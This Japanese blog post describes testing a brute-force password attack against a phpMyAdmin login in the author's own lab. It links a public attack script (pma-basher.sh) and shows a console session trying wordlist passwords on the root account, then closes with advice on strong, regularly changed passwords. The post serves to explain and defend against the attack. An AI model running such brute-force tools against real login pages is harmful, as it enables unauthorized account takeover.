最近、gooやYahoo、CCC、JR東日本などのサイトが不正アクセスをされていたというニュースがあったので
BruteForceAttackを検証してみました。
BruteForceAttack:
パスワードの取得のため、辞書ツールを使いあらゆる文字の組み合わせで総当たりを試み、
暗号の解読のためには考えられるすべての暗号鍵をリストアップして暗号文の切れ端を復号化できるか試みる攻撃。
実際にはアカウントリストとパスワードリストを用意して
何回もログインを試みます。
今回、検証環境にはサイトのログイン画面を用意できませんでしたので、
代わりに検証環境のphpMyAdminのログイン画面に対して攻撃をしかけてみました。
phpMyAdmin:
PHPで実装されたMySQLの管理ツール
通常、管理者しかアクセスできないようにBasic認証をかけたり、
外部から接続できないようにしている。
いろいろ調べてみると、phpMyAdmin専用にBruteForceAttackを仕掛けるスクリプトがありましたので
今回はそれを試してみました。
下記のスクリプトをLinuxサーバにいれてためしてみました。
https://github.com/Hood3dRob1n/PMA/blob/master/pma-basher.sh
root@bt:/home/work# ./pma-basher.sh Please select which option you would like to use: 1) PMA Finder 2) PMA Bruteforcer 3) Exit #? 2 Please provide site and path to PhpMyAdmin page you want to bruteforce: http://192.168.112.130/phpMyAdmin/ Please provide username to bruteforce: root Please provide path to wordlist to use: /home/work/passwords.lst Do you want to use a proxy? (y/n) n OK, just checking.... OK, preparing to bruteforce root account at with this wordlist: /home/work/passwords.lst.... [BAD] root: [BAD] root:...... [BAD] root:****** [BAD] root:00000 [BAD] root:000000 [BAD] root:0000000 [BAD] root:00000000 [BAD] root:0000000000 [BAD] root:000001 [BAD] root:007007 [BAD] root:010101 [BAD] root:010203 [BAD] root:01234 [BAD] root:012345 [BAD] root:0123456 [BAD] root:01234567 [BAD] root:0123456789
こんな感じでrootユーザに対してパスワードリストにあるパスワードを自動で実行してくれます。
下記動画に詳しく成功した場合がついてましたので見てみてください。
このことからパスワードは英数記号の分かりにくいものにしなければならないことがよくわかります。
また、一度漏れたアカウントとパスワードは
他のサイトでも使われたりするらしいので
定期的に変更したほうがいいですね。
以上